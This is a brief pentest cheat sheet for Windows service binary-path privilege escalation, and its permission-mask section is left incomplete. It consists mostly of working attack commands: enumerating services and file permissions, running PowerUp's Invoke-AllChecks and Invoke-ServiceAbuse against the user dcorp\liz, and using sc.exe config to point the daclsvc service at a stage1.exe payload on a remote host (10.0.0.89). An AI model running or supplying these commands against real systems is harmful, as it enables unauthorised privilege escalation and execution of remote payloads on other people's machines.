Binary Paths

Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}

View permissions

icacls "C:\xampp\apache\bin\mysqld.exe"

sc.exe sdshow <service>

Mask

Permissions

Full access

Modify access

Read and execute access

Read-only access

Write-only access

. .\PowerUp.ps1
Invoke-AllChecks

sc.exe config daclsvc binpath= "\\dcorp-workstation5\stage1.exe"
sc.exe config daclsvc binpath= "\\10.0.0.89\stage1.exe"

Invoke-ServiceAbuse -Name 'Service' -UserName dcorp\liz -verbose

Last updated 12 months ago